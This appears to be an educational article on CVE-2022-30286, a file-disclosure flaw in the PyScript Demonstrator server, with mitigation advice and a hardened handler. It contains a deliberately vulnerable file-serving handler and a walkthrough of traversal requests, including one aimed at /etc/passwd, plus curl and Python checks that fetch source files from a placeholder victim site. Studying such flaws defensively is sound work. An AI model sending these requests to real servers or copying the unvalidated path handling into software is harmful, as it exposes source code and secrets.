In 2022, a serious vulnerability—CVE-2022-30286—was discovered in pyscriptjs, also known as PyScript Demonstrator. This flaw opened the door for attackers to remotely view sensitive Python code behind your online apps, all because of insecure design in how code requests were processed up until May 4, 2022.
Let's dive into what happened, how it works, and exactly how your source code could leak—with simple explanations and real code. At the end, you'll find references and ways to keep your projects safe.
What Is PyScript Demonstrator?
PyScript Demonstrator was an early playground for PyScript, a project that runs Python directly in the browser using WebAssembly and Pyodide. For learning and demos, it offered a lightweight HTTP server (pyscriptjs), which could deliver Python snippets and scripts for folks to test or show off.
The problem? The demo server had almost zero protection and handled file serving very naively. It trusted file paths sent in client requests, exposing Python source files to anyone on the internet.
The Core Issue
On every HTTP request, the server took the URL path or parameters and fetched the corresponding file on disk. There was barely any input validation or directory restrictions. This meant a remote attacker could trick the server into giving up the Python files behind the site—files not meant to be public.
Technical Details
Let's look at a stripped-down version of what the vulnerable code could look like (based on the real PyScript Demonstrator):

```python
from http.server import SimpleHTTPRequestHandler, HTTPServer


class DemoHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        # Naively serve any file from the current directory
        if self.path.startswith('/files/'):
            filename = self.path[len('/files/'):]  # NO validation here!
            with open(filename, 'rb') as f:
                self.send_response(200)
                self.end_headers()
                self.wfile.write(f.read())
            return
        super().do_GET()


if __name__ == '__main__':
    # Start the demo server so the handler above is reachable
    HTTPServer(('', 8000), DemoHandler).serve_forever()
```
What's wrong here?
- `filename` is controlled by the user via the URL (`/files/mysecret.py`); nothing strips `..` segments or pins the result to an intended directory before `open()` is called.
1. Find the vulnerable endpoint. Visit a site running the demo (e.g., `http://example.com/files/`).
2. Try to read `main.py` (assuming it's not meant for users):
   `GET http://example.com/files/main.py`
3. Receive the source code! If successful, the server responds with the full Python code. An attacker can iterate through common names (`app.py`, `settings.py`, etc.) or brute-force filenames.
4. Try to climb directories:
   `GET http://example.com/files/../secrets.py`
   or even
   `GET http://example.com/files/../../etc/passwd`
   Depending on the directory the server was started from and its file permissions, sensitive files outside the intended folder could be revealed!
What Can Attackers Actually Do?
- Steal Your Source Code: Secret business logic, API keys (if hardcoded), or intellectual property can be downloaded.
- Find Other Vulnerabilities: Reviewing internal code gives clues for deeper attacks—like hardcoded passwords or weak algorithms.
- Wider Server Exposure: If directory traversal is possible, attackers might see environment files (.env), password lists, or system info.
Who Was Affected?
- Anyone running pre-May 2022 versions of PyScript Demonstrator (pyscriptjs) in a public or private web space.
You could use a simple tool like curl, or a short Python script, to check whether a server is affected:

```bash
curl http://victimsite.com/files/app.py
```

Or in Python:

```python
import requests

url = "http://victimsite.com/files/app.py"
resp = requests.get(url, timeout=10)  # timeout so a silent server doesn't hang the check
if resp.status_code == 200:
    print("[+] Got source!")
    print(resp.text)
else:
    print("[-] Not found or patched.")
```
Mitigation & Patch
- Upgrade/Patch: The vulnerability was fixed on May 4, 2022 (see the patch commit in the references below) by restricting file access, sanitizing input, and mounting a virtual "files" root.
- Never Trust User Input: Always sanitize and validate paths. Resolve the requested path with Python's `os.path` helpers and confirm it stays inside the intended directory, or, even better, use a framework that handles static file serving securely.
- Minimize Exposed Files: Only make files public if they need to be.
- Security Reviews for Demo Servers: Even for demo tools, always assume they're accessible by attackers.
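To make the mitigation concrete, here is a hardened version of the handler, written as an added example for this article (it is not the project's patch). It assumes a POSIX filesystem and a hypothetical `public_files` directory as the only root that may be served; everything else about the request handling mirrors the vulnerable snippet above.

```python
import os
from urllib.parse import unquote, urlsplit
from http.server import SimpleHTTPRequestHandler, HTTPServer

# Hypothetical directory that is the only one we intend to serve.
PUBLIC_ROOT = os.path.realpath("public_files")
# Only the file types the demo needs to expose; .env, keys, etc. never match.
ALLOWED_SUFFIXES = (".py", ".html", ".txt")

def resolve_public_path(request_path, root=PUBLIC_ROOT):
    """Map a '/files/<name>' URL to a file inside `root`, or return None.
    None means wrong prefix, disallowed file type, or a path that leaves
    `root` after decoding and resolving ('..', absolute paths, symlinks)."""
    # Strip query string/fragment, then percent-decode so '%2e%2e' -> '..'.
    url_path = unquote(urlsplit(request_path).path)
    prefix = "/files/"
    if not url_path.startswith(prefix):
        return None
    relative = url_path[len(prefix):]
    if not relative.endswith(ALLOWED_SUFFIXES):
        return None
    # realpath collapses '..' and follows symlinks; commonpath then proves
    # containment (a plain startswith() would accept 'public_files_secret/').
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

class SafeDemoHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        target = resolve_public_path(self.path)
        if target is None:
            self.send_error(404)  # same answer for traversal and missing file
            return
        try:
            with open(target, "rb") as f:
                data = f.read()
        except OSError:  # directory, unreadable, or removed between checks
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

if __name__ == "__main__":
    os.makedirs(PUBLIC_ROOT, exist_ok=True)
    HTTPServer(("127.0.0.1", 8000), SafeDemoHandler).serve_forever()
```

`resolve_public_path` is the part worth unit-testing: every traversal form from the walkthrough above (`..`, percent-encoded `..`, an absolute path after the prefix) resolves to `None`, while `/files/main.py` maps to a path under `PUBLIC_ROOT`.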
References
1. NVD CVE-2022-30286 Entry
2. Original Issue on GitHub
3. PyScriptjs Patch Commit
4. PyScript Official
Summary
CVE-2022-30286 is a classic file disclosure bug, made more serious by the trust people put in demo tools. It shows why even "non-production" code needs security reviews. If you're building with Python and HTTP, always take file serving seriously!
Is your demo server still running an old version? Patch or restrict it now—before someone pokes around your source!
*© 2024. For educational use only. Don’t exploit live systems without permission.*
Timeline
Published on: 05/09/2022 12:15:00 UTC
Last modified on: 05/16/2022 18:47:00 UTC